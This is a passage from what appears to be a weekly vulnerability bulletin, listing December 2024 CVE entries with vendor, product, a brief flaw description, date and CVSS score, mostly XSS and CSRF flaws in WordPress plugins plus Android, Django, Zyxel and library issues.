Credentials Disclosure vulnerabilities allow access to on board project back-up bundles. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02 | 2024-12-05 | 7.5 | CVE-2024-51546 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking ClearPass Policy Manager |
A vulnerability in the HPE Aruba Networking ClearPass Policy Manager web-based management interface could allow an authenticated remote threat actor to conduct a remote code execution attack. Successful exploitation could enable the attacker to run arbitrary commands on the underlying operating system. | 2024-12-03 | 7.2 | CVE-2024-51771 |
| eduNEXT--Open edX LMS |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eduNEXT Open edX LMS allows Reflected XSS.This issue affects Open edX LMS: from n/a through 2.6.1. | 2024-12-02 | 7.1 | CVE-2024-52452 |
| Jon Lorang--Library Bookshelves |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jon Lorang Library Bookshelves allows Reflected XSS.This issue affects Library Bookshelves: from n/a through 5.8. | 2024-12-02 | 7.1 | CVE-2024-52453 |
| GoQSystem Inc.--GoQMieruca |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GoQSystem Inc. GoQMieruca allows Reflected XSS.This issue affects GoQMieruca: from n/a through 1.0.0. | 2024-12-02 | 7.1 | CVE-2024-52454 |
| GoQSystem Inc.--GoQSmile |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GoQSystem Inc. GoQSmile allows Reflected XSS.This issue affects GoQSmile: from n/a through 1.0.1. | 2024-12-02 | 7.1 | CVE-2024-52455 |
| WPoets--Awesome Studio |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPoets Awesome Studio allows Reflected XSS.This issue affects Awesome Studio: from n/a through 2.4.4. | 2024-12-02 | 7.1 | CVE-2024-52456 |
| Youneeq--Youneeq Recommendations |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Youneeq Youneeq Recommendations allows Reflected XSS.This issue affects Youneeq Recommendations: from n/a through 3.0.7. | 2024-12-02 | 7.1 | CVE-2024-52457 |
| Templines--TM Islamic Helper |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Templines TM Islamic Helper allows Reflected XSS.This issue affects TM Islamic Helper: from n/a through 1.0.1. | 2024-12-02 | 7.1 | CVE-2024-52458 |
| Chameleoni.com--Chameleoni Jobs |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chameleoni.com Chameleoni Jobs allows Reflected XSS.This issue affects Chameleoni Jobs: from n/a through 2.5.2. | 2024-12-02 | 7.1 | CVE-2024-52459 |
| AtaraPay--AtaraPay WooCommerce Payment Gateway |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AtaraPay AtaraPay WooCommerce Payment Gateway allows Reflected XSS.This issue affects AtaraPay WooCommerce Payment Gateway: from n/a through 2.0.13. | 2024-12-02 | 7.1 | CVE-2024-52460 |
| Kinsta WordPress Hosting--Infinite Slider |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kinsta WordPress Hosting Infinite Slider allows Reflected XSS.This issue affects Infinite Slider: from n/a through 2.0.1. | 2024-12-02 | 7.1 | CVE-2024-52461 |
| Jacob Schwartz--WP e-Commerce Style Email |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jacob Schwartz WP e-Commerce Style Email allows Reflected XSS.This issue affects WP e-Commerce Style Email: from n/a through 0.6.2. | 2024-12-02 | 7.1 | CVE-2024-52462 |
| Kat Hagan--Post By Email |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kat Hagan Post By Email allows Reflected XSS.This issue affects Post By Email: from n/a through 1.0.4b. | 2024-12-02 | 7.1 | CVE-2024-52463 |
| anmari--amr shortcodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anmari amr shortcodes allows Reflected XSS.This issue affects amr shortcodes: from n/a through 1.7. | 2024-12-02 | 7.1 | CVE-2024-52464 |
| Data443--LGPD Framework |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Data443 LGPD Framework allows Reflected XSS.This issue affects LGPD Framework: from n/a through 2.0.2. | 2024-12-02 | 7.1 | CVE-2024-52465 |
| Explara--Explara Events |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Explara Explara Events allows Reflected XSS.This issue affects Explara Events: from n/a through 0.1.3. | 2024-12-02 | 7.1 | CVE-2024-52466 |
| August Infotech--AI Responsive Gallery Album |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in August Infotech AI Responsive Gallery Album allows Reflected XSS.This issue affects AI Responsive Gallery Album: from n/a through 1.4. | 2024-12-02 | 7.1 | CVE-2024-52467 |
| LeadBoxer--LeadBoxer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LeadBoxer LeadBoxer allows Reflected XSS.This issue affects LeadBoxer: from n/a through 1.2. | 2024-12-02 | 7.1 | CVE-2024-52468 |
| Dhrubok Infotech--WooCommerce Price Alert |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dhrubok Infotech WooCommerce Price Alert allows Reflected XSS.This issue affects WooCommerce Price Alert: from n/a through 1.0.4. | 2024-12-02 | 7.1 | CVE-2024-52469 |
| No-nonsense Labs--Document & Data Automation |
Cross-Site Request Forgery (CSRF) vulnerability in No-nonsense Labs Document & Data Automation allows Stored XSS.This issue affects Document & Data Automation: from n/a through 1.6.1. | 2024-12-02 | 7.1 | CVE-2024-52477 |
| Ortto--Ortto |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ortto Ortto allows Reflected XSS.This issue affects Ortto: from n/a through 1.0.19. | 2024-12-02 | 7.1 | CVE-2024-52482 |
| Igor Beni--LeanPress |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Igor Benić LeanPress allows Reflected XSS.This issue affects LeanPress: from n/a through 1.0.0. | 2024-12-02 | 7.1 | CVE-2024-52483 |
| Subhasish Manna--Wc Recently viewed products |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Subhasish Manna Wc Recently viewed products allows Reflected XSS.This issue affects Wc Recently viewed products: from n/a through 1.0.1. | 2024-12-02 | 7.1 | CVE-2024-52484 |
| Lorex--2K Indoor Wi-Fi Security Camera |
An authenticated attacker can trigger a stack based buffer overflow in the DHIP Service (TCP port 80). This vulnerability has been resolved in firmware version 2.800.0000000.8.R.20241111. | 2024-12-03 | 7.2 | CVE-2024-52547 |
| n/a--n/a |
Incorrect access control in the component content://com.handcent.messaging.provider.MessageProvider/ of Handcent NextSMS v10.9.9.7 allows attackers to access sensitive data. | 2024-12-02 | 7.5 | CVE-2024-53605 |
| ITERAS--ITERAS |
Cross-Site Request Forgery (CSRF) vulnerability in ITERAS ITERAS allows Stored XSS.This issue affects ITERAS: from n/a through 1.7.0. | 2024-12-02 | 7.1 | CVE-2024-53710 |
| Jean-Marc BIANCA--Hotlink2Watermark |
Cross-Site Request Forgery (CSRF) vulnerability in Jean-Marc BIANCA Hotlink2Watermark allows Stored XSS.This issue affects Hotlink2Watermark: from n/a through 0.3.2. | 2024-12-02 | 7.1 | CVE-2024-53711 |
| Kevin McCabe--Kevin's |
Cross-Site Request Forgery (CSRF) vulnerability in Kevin McCabe Kevin's allows Stored XSS.This issue affects Kevin's: from n/a through 2.0.0. | 2024-12-02 | 7.1 | CVE-2024-53712 |
| Alain Diart for les-sushi-codeurs.fr & Eric Ambrosi for regart.net--Silverlight Video Player |
Cross-Site Request Forgery (CSRF) vulnerability in Alain Diart for les-sushi-codeurs.fr & Eric Ambrosi for regart.net Silverlight Video Player allows Stored XSS.This issue affects Silverlight Video Player: from n/a through 1.0. | 2024-12-02 | 7.1 | CVE-2024-53713 |
| Arrow Design--Continue Shopping From Cart |
Cross-Site Request Forgery (CSRF) vulnerability in Arrow Design Continue Shopping From Cart allows Stored XSS.This issue affects Continue Shopping From Cart: from n/a through 1.3. | 2024-12-02 | 7.1 | CVE-2024-53714 |
| Thomas Hoefter--Simple Travel Map |
Cross-Site Request Forgery (CSRF) vulnerability in Thomas Hoefter Simple Travel Map allows Stored XSS.This issue affects Simple Travel Map: from n/a through 0.1. | 2024-12-02 | 7.1 | CVE-2024-53715 |
| overtrue--wp auto top |
Cross-Site Request Forgery (CSRF) vulnerability in overtrue wp auto top allows Stored XSS.This issue affects wp auto top: from n/a through 2.9.3. | 2024-12-02 | 7.1 | CVE-2024-53716 |
| Yonatan Reinberg--yPHPlista |
Cross-Site Request Forgery (CSRF) vulnerability in Yonatan Reinberg yPHPlista allows Stored XSS.This issue affects yPHPlista: from n/a through 1.1.1. | 2024-12-02 | 7.1 | CVE-2024-53717 |
| Eric Teubert--Multi Feed Reader |
Cross-Site Request Forgery (CSRF) vulnerability in Eric Teubert Multi Feed Reader allows Stored XSS.This issue affects Multi Feed Reader: from n/a through 2.2.4. | 2024-12-02 | 7.1 | CVE-2024-53718 |
| onigetoc--Zajax Ajax Navigation |
Cross-Site Request Forgery (CSRF) vulnerability in onigetoc Zajax - Ajax Navigation allows Stored XSS.This issue affects Zajax - Ajax Navigation: from n/a through 0.4. | 2024-12-02 | 7.1 | CVE-2024-53719 |
| ole1986 , MachineITSvcs--WP-ISPConfig 3 |
Cross-Site Request Forgery (CSRF) vulnerability in ole1986 , MachineITSvcs WP-ISPConfig 3 allows Stored XSS.This issue affects WP-ISPConfig 3: from n/a through 1.5.6. | 2024-12-02 | 7.1 | CVE-2024-53720 |
| Rockemmusic--Favicon My Blog |
Cross-Site Request Forgery (CSRF) vulnerability in Rockemmusic Favicon My Blog allows Stored XSS.This issue affects Favicon My Blog: from n/a through 1.0.2. | 2024-12-02 | 7.1 | CVE-2024-53722 |
| A.Cihangir BALTACI--Google Plus Share and +1 Button |
Cross-Site Request Forgery (CSRF) vulnerability in A.Cihangir BALTACI Google Plus Share and +1 Button allows Stored XSS.This issue affects Google Plus Share and +1 Button: from n/a through 1.0. | 2024-12-02 | 7.1 | CVE-2024-53723 |
| Ronny L. Bull--IceStats |
Cross-Site Request Forgery (CSRF) vulnerability in Ronny L. Bull IceStats allows Stored XSS.This issue affects IceStats: from n/a through 1.3. | 2024-12-02 | 7.1 | CVE-2024-53724 |
| Script-Recipes--Post Hits Counter |
Cross-Site Request Forgery (CSRF) vulnerability in Script-Recipes Post Hits Counter allows Reflected XSS.This issue affects Post Hits Counter: from n/a through 2.8.23. | 2024-12-02 | 7.1 | CVE-2024-53725 |
| Realty Candy--RealtyCandy IDX Broker Extended |
Cross-Site Request Forgery (CSRF) vulnerability in Realty Candy RealtyCandy IDX Broker Extended allows Stored XSS.This issue affects RealtyCandy IDX Broker Extended: from n/a through 1.5.1. | 2024-12-02 | 7.1 | CVE-2024-53726 |
| LinkLaunder.com--LinkLaunder SEO |
Cross-Site Request Forgery (CSRF) vulnerability in LinkLaunder.com LinkLaunder SEO allows Stored XSS.This issue affects LinkLaunder SEO: from n/a through 0.92.1. | 2024-12-02 | 7.1 | CVE-2024-53727 |
| SEO-Kche Internet Marketing GmbH & Co. KG--Protect Your Content |
Cross-Site Request Forgery (CSRF) vulnerability in SEO-Küche Internet Marketing GmbH & Co. KG Protect Your Content allows Stored XSS.This issue affects Protect Your Content: from n/a through 1.0.2. | 2024-12-02 | 7.1 | CVE-2024-53728 |
| Plumeria Web Design--Blizzard Quotes |
Cross-Site Request Forgery (CSRF) vulnerability in Plumeria Web Design Blizzard Quotes allows Stored XSS.This issue affects Blizzard Quotes: from n/a through 1.3. | 2024-12-02 | 7.1 | CVE-2024-53729 |
| Aaron Hodge Silver--April's Call Posts |
Cross-Site Request Forgery (CSRF) vulnerability in Aaron Hodge Silver April's Call Posts allows Stored XSS. This issue affects April's Call Posts: from n/a through 2.1.1. | 2024-12-02 | 7.1 | CVE-2024-53730 |
| NotFound--WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates allows Reflected XSS.This issue affects WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates: from n/a through n/a. | 2024-12-02 | 7.1 | CVE-2024-53740 |
| CultBooking--CultBooking Hotel Booking Engine |
Cross-Site Request Forgery (CSRF) vulnerability in CultBooking CultBooking Hotel Booking Engine allows Stored XSS.This issue affects CultBooking Hotel Booking Engine: from n/a through 2.1. | 2024-12-02 | 7.1 | CVE-2024-53753 |
| Arrow Design--Out Of Stock Badge |
Cross-Site Request Forgery (CSRF) vulnerability in Arrow Design Out Of Stock Badge allows Cross Site Request Forgery.This issue affects Out Of Stock Badge: from n/a through 1.3.1. | 2024-12-02 | 7.1 | CVE-2024-53754 |
| Andrea Pernici--Third Party Cookie Eraser |
Cross-Site Request Forgery (CSRF) vulnerability in Andrea Pernici Third Party Cookie Eraser allows Stored XSS.This issue affects Third Party Cookie Eraser: from n/a through 1.0.2. | 2024-12-02 | 7.1 | CVE-2024-53755 |
| Planet Studio team--ArCa Payment Gateway |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Planet Studio team ArCa Payment Gateway allows Stored XSS.This issue affects ArCa Payment Gateway: from n/a through 1.3.1. | 2024-12-02 | 7.1 | CVE-2024-53759 |
| Faster Themes--FastBook Responsive Appointment Booking and Scheduling System |
Cross-Site Request Forgery (CSRF) vulnerability in Faster Themes FastBook - Responsive Appointment Booking and Scheduling System allows Stored XSS.This issue affects FastBook - Responsive Appointment Booking and Scheduling System: from n/a through 1.1. | 2024-12-02 | 7.1 | CVE-2024-53762 |
| Think201--Mins To Read |
Cross-Site Request Forgery (CSRF) vulnerability in Think201 Mins To Read allows Stored XSS.This issue affects Mins To Read: from n/a through 1.2.2. | 2024-12-02 | 7.1 | CVE-2024-53765 |
| Ludovic RIAUDEL--Custom Post Type to Map Store |
Cross-Site Request Forgery (CSRF) vulnerability in Ludovic RIAUDEL Custom Post Type to Map Store allows Stored XSS.This issue affects Custom Post Type to Map Store: from n/a through 1.1.0. | 2024-12-02 | 7.1 | CVE-2024-53769 |
| Peter MacIntyre--RingCentral Communications |
Cross-Site Request Forgery (CSRF) vulnerability in Peter MacIntyre RingCentral Communications allows Stored XSS.This issue affects RingCentral Communications: from n/a through 1.6.1. | 2024-12-02 | 7.1 | CVE-2024-53770 |
| Raphael Heide--Donate Me |
Cross-Site Request Forgery (CSRF) vulnerability in Raphael Heide Donate Me allows Stored XSS.This issue affects Donate Me: from n/a through 1.2.5. | 2024-12-02 | 7.1 | CVE-2024-53776 |
| Alberto Reineri--Simple Header and Footer |
Cross-Site Request Forgery (CSRF) vulnerability in Alberto Reineri Simple Header and Footer allows Stored XSS.This issue affects Simple Header and Footer: from n/a through 1.0.0. | 2024-12-02 | 7.1 | CVE-2024-53777 |
| Max Engel--Yahoo! WebPlayer |
Cross-Site Request Forgery (CSRF) vulnerability in Max Engel Yahoo! WebPlayer allows Stored XSS.This issue affects Yahoo! WebPlayer: from n/a through 2.0.6. | 2024-12-02 | 7.1 | CVE-2024-53779 |
| Rajeev Chauhan--Load More Posts |
Cross-Site Request Forgery (CSRF) vulnerability in Rajeev Chauhan Load More Posts allows Stored XSS.This issue affects Load More Posts: from n/a through 1.4.0. | 2024-12-02 | 7.1 | CVE-2024-53780 |
| Home Junction--SpatialMatch IDX |
Cross-Site Request Forgery (CSRF) vulnerability in Home Junction SpatialMatch IDX allows Stored XSS.This issue affects SpatialMatch IDX: from n/a through 3.0.9. | 2024-12-02 | 7.1 | CVE-2024-53781 |
| CMSaccount--Photo Video Store |
Cross-Site Request Forgery (CSRF) vulnerability in CMSaccount Photo Video Store allows Cross-Site Scripting (XSS).This issue affects Photo Video Store: from n/a through 21.07. | 2024-12-02 | 7.1 | CVE-2024-53782 |
| Ritesh Sanap--Advanced What should we write next about |
Cross-Site Request Forgery (CSRF) vulnerability in Ritesh Sanap Advanced What should we write next about allows Stored XSS.This issue affects Advanced What should we write next about: from n/a through 1.0.3. | 2024-12-02 | 7.1 | CVE-2024-53789 |
| brandtoss--WP Mailster |
Insertion of Sensitive Information Into Sent Data vulnerability in brandtoss WP Mailster allows Retrieve Embedded Sensitive Data.This issue affects WP Mailster: from n/a through 1.8.16.0. | 2024-12-06 | 7.5 | CVE-2024-53804 |
| brandtoss--WP Mailster |
Missing Authorization vulnerability in brandtoss WP Mailster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Mailster: from n/a through 1.8.16.0. | 2024-12-06 | 7.5 | CVE-2024-53805 |
| Jacques Malgrange--WP GeoNames |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jacques Malgrange WP GeoNames allows Reflected XSS.This issue affects WP GeoNames: from n/a through 1.8. | 2024-12-06 | 7.1 | CVE-2024-53812 |
| Acowebs--Product Labels For Woocommerce |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Acowebs Product Labels For Woocommerce allows Blind SQL Injection.This issue affects Product Labels For Woocommerce: from n/a through 1.5.8. | 2024-12-06 | 7.6 | CVE-2024-53817 |
| NotFound--Pie Register Premium |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Pie Register Premium allows Reflected XSS.This issue affects Pie Register Premium: from n/a through n/a. | 2024-12-06 | 7.1 | CVE-2024-53821 |
| AREOI--All Bootstrap Blocks |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AREOI All Bootstrap Blocks allows PHP Local File Inclusion.This issue affects All Bootstrap Blocks: from n/a through 1.3.19. | 2024-12-06 | 7.5 | CVE-2024-53824 |
| rpgp--rpgp |
rPGP is a pure Rust implementation of OpenPGP. Prior to 0.14.1, rPGP allows an attacker to trigger rpgp crashes by providing crafted data. This vulnerability is fixed in 0.14.1. | 2024-12-05 | 7.5 | CVE-2024-53856 |
| rpgp--rpgp |
rPGP is a pure Rust implementation of OpenPGP. Prior to 0.14.1, rPGP allows attackers to trigger resource exhaustion vulnerabilities in rpgp by providing crafted messages. This affects general message parsing and decryption with symmetric keys. | 2024-12-05 | 7.5 | CVE-2024-53857 |
| n/a--n/a |
An issue was discovered in Django 5.1 before 5.1.4, 5.0 before 5.0.10, and 4.2 before 4.2.17. The strip_tags() method and striptags template filter are subject to a potential denial-of-service attack via certain inputs containing large sequences of nested incomplete HTML entities. | 2024-12-06 | 7.5 | CVE-2024-53907 |
| Kludex--python-multipart |
python-multipart is a streaming multipart parser for Python. When parsing form data, python-multipart skips line breaks (CR \r or LF \n) in front of the first boundary and any tailing bytes after the last boundary. This happens one byte at a time and emits a log event each time, which may cause excessive logging for certain inputs. An attacker could abuse this by sending a malicious request with lots of data before the first or after the last boundary, causing high CPU load and stalling the processing thread for a significant amount of time. In case of ASGI application, this could stall the event loop and prevent other requests from being processed, resulting in a denial of service (DoS). This vulnerability is fixed in 0.0.18. | 2024-12-02 | 7.5 | CVE-2024-53981 |
| MobSF--Mobile-Security-Framework-MobSF |
Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. In versions prior to 3.9.7, the requests.get() request in the _check_url method is specified as allow_redirects=True, which allows a server-side request forgery when a request to .well-known/assetlinks.json" returns a 302 redirect. This is a bypass of the fix for CVE-2024-29190 and is fixed in 3.9.7. | 2024-12-03 | 7.5 | CVE-2024-54000 |
| open-quantum-safe--liboqs |
liboqs is a C-language cryptographic library that provides implementations of post-quantum cryptography algorithms. A correctness error has been identified in the reference implementation of the HQC key encapsulation mechanism. Due to an indexing error, part of the secret key is incorrectly treated as non-secret data. This results in an incorrect shared secret value being returned when the decapsulation function is called with a malformed ciphertext. This vulnerability is fixed in 0.12.0. | 2024-12-06 | 7.4 | CVE-2024-54137 |
| Paloma--Paloma Widget |
Cross-Site Request Forgery (CSRF) vulnerability in Paloma Paloma Widget allows Cross Site Request Forgery.This issue affects Paloma Widget: from n/a through 1.14. | 2024-12-06 | 7.1 | CVE-2024-54205 |
| Joni Halabi--Block Controller |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joni Halabi Block Controller allows Reflected XSS.This issue affects Block Controller: from n/a through 1.4.2. | 2024-12-06 | 7.1 | CVE-2024-54208 |
| WPFactory--Awesome Shortcodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Awesome Shortcodes allows Reflected XSS.This issue affects Awesome Shortcodes: from n/a through 1.7.2. | 2024-12-06 | 7.1 | CVE-2024-54209 |
| NotFound--ARForms |
Path Traversal vulnerability in NotFound ARForms allows Path Traversal.This issue affects ARForms: from n/a through 6.4.1. | 2024-12-06 | 7.7 | CVE-2024-54216 |
| n/a--n/a |
An issue was discovered in Veritas NetBackup before 10.5. This only applies to NetBackup components running on a Windows Operating System. If a user executes specific NetBackup commands or an attacker uses social engineering techniques to impel the user to execute the commands, a malicious DLL could be loaded, resulting in execution of the attacker's code in the user's security context, a different vulnerability than CVE-2024-52945. | 2024-12-04 | 7.8 | CVE-2024-54664 |
| Zyxel--VMG8825-T50K firmware |
A buffer overflow vulnerability in the packet parser of the third-party library "libclinkc" in Zyxel VMG8825-T50K firmware versions through V5.50(ABOM.8.4)C0 could allow an attacker to cause a temporary denial of service (DoS) condition against the web management interface by sending a crafted HTTP POST request to a vulnerable device. | 2024-12-03 | 7.5 | CVE-2024-8748 |
| Zyxel--VMG4005-B50A firmware |
A post-authentication command injection vulnerability in the "host" parameter of the diagnostic function in Zyxel VMG4005-B50A firmware versions through V5.15(ABQA.2.2)C0 could allow an authenticated attacker with administrator privileges to execute operating system (OS) commands on a vulnerable device. | 2024-12-03 | 7.2 | CVE-2024-9200 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Google--Android |
In tscpu_write_GPIO_out and mtkts_Abts_write of mtk_ts_Abts.c, there is a possible buffer overflow in an sscanf due to improper input validation. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 6.7 | CVE-2017-13308 |
| Google--Android |
In reboot_block_command of htc reboot_block driver, there is a possible stack buffer overflow due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 6.7 | CVE-2018-9386 |
| Google--Android |
In procfile_write of gl_proc.c, there is a possible out of bounds read of a function pointer due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 6.7 | CVE-2018-9390 |
| Google--Android |
In update_gps_sv and output_vzw_debug of vendor/mediatek/proprietary/hardware/connectivity/gps/gps_hal/src/gpshal_wor ker.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | 6.7 | CVE-2018-9391 |
| Google--Android |
In emmc_rpmb_ioctl of emmc_rpmb.c, there is an Information Disclosure due to a Missing Bounds Check. This could lead to Information Disclosure of kernel data. | 2024-12-05 | 6.5 | CVE-2018-9407 |
| Google--Android |
In RsaKeyPairGenerator::getNumberOfIterations of RSAKeyPairGenerator.java, an incorrect implementation could cause weak RSA key pairs being generated. This could lead to crypto vulnerability with no additional execution privileges needed. User interaction is not needed for exploitation. Bulletin Fix: The fix is designed to correctly implement the key generation according to FIPS standard. | 2024-12-02 | 6.5 | CVE-2018-9426 |
| Google--Android |
In buildImageItemsIfPossible of ItemTable.cpp there is a possible out of bound read due to uninitialized data. This could lead to information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-12-02 | 6.5 | CVE-2018-9429 |
| Google--Android |
In gatt_process_error_rsp of gatt_cl.cc, there is a possible out of bound read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-12-02 | 6.2 | CVE-2018-9435 |
| astoundify--WP Job Manager Company Profiles |
The WP Job Manager - Company Profiles plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'company' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-04 | 6.1 | CVE-2023-6978 |
| persianscript-- Persian WooCommerce SMS |
The افزونه پیامک ووکامرس Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-10046 |
| eyale-vc--Contact Form Builder by vcita |
The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-05 | 6.4 | CVE-2024-10056 |
| gutentor--Gutentor Gutenberg Blocks Page Builder for Gutenberg Editor |
The Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-05 | 6.4 | CVE-2024-10178 |
| iamjonasmarlo--Cookielay |
The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-10320 |
| brainstormforce--Spectra WordPress Gutenberg Blocks |
The Spectra - WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Team' widget in all versions up to, and including, 2.16.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-10484 |
| reputeinfosystems--ARMember Membership Plugin, Content Restriction, Member Levels, User Profile & User signup |
The The ARMember - Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.0.51. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes. | 2024-12-06 | 6.3 | CVE-2024-10681 |
| jooseposti--Posti Shipping |
The Posti Shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.10.3. This is due to missing or incorrect nonce validation on the generate_notices_html() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-04 | 6.1 | CVE-2024-10832 |
| themesdaddy--Flixita |
The Flixita theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.0.82 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-10836 |
| desertthemes--NewsMunch |
The NewsMunch theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-05 | 6.4 | CVE-2024-10848 |
| desertthemes--NewsMash |
The NewsMash theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.71 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-10849 |
| ultimatemember--ForumWP Forum & Discussion Board |
The ForumWP - Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-10879 |
| sodah--LUNA RADIO PLAYER |
The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-05 | 6.4 | CVE-2024-10881 |
| searchiq--SearchIQ The Search Solution |
The SearchIQ - The Search Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siq_searchbox' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-10885 |
| kingyes--Pojo Forms |
